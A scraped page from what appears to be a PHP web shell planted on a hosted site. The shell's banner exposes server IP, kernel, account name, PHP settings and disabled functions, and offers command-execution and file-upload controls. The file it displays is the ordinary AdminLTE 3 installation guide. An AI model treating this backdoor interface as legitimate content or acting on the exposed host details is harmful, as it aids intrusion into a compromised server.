|
Server IP : 145.79.210.100 / Your IP : 216.73.216.101 Web Server : LiteSpeed System : Linux in-mum-web1954.main-hosting.eu 5.14.0-570.26.1.el9_6.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 16 09:12:04 EDT 2025 x86_64 User : u474798400 ( 474798400) PHP Version : 7.4.33 Disable Function : system, exec, shell_exec, passthru, mysql_list_dbs, ini_alter, dl, symlink, link, chgrp, leak, popen, apache_child_terminate, virtual, mb_send_mail MySQL : OFF | cURL : ON | WGET : ON | Perl : OFF | Python : OFF Directory (0755) : /home/u474798400/domains/excentia.in/public_html/admin/docs/ |
| [ Home ] | [ C0mmand ] | [ Upload File ] |
|---|
--- layout: page title: Introduction --- ## Quick start There are multiple ways to install AdminLTE. ### Download & Changelog: Always Recommended to download from GitHub latest release [AdminLTE 3](https://github.com/ColorlibHQ/AdminLTE/releases/latest) for bug free and latest features.\ Visit the [releases](https://github.com/ColorlibHQ/AdminLTE/releases) page to view the changelog.\ Legacy Releases are [AdminLTE 2](https://github.com/ColorlibHQ/AdminLTE/releases/tag/v2.4.18) / [AdminLTE 1](https://github.com/ColorlibHQ/AdminLTE/releases/tag/1.3.1). ## Stable release ### Grab from [jsdelivr](https://www.jsdelivr.com/package/npm/admin-lte) CDN: _**Important Note**: You needed to add separately cdn links for plugins in your project._ ```html <script src="https://cdn.jsdelivr.net/npm/admin-lte@3.2/dist/js/adminlte.min.js"></script> ``` ```html <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/admin-lte@3.2/dist/css/adminlte.min.css"> ``` ### Using The Command Line: _**Important Note**: To install it via npm/Yarn, you need at least Node.js 14 or higher._ #### Via npm ```bash npm install admin-lte@^3.2 --save ``` #### Via Yarn ```bash yarn add admin-lte@^3.2 ``` #### Via Composer ```bash composer require "almasaeed2010/adminlte=~3.2" ``` #### Via Git ```bash git clone https://github.com/ColorlibHQ/AdminLTE.git ```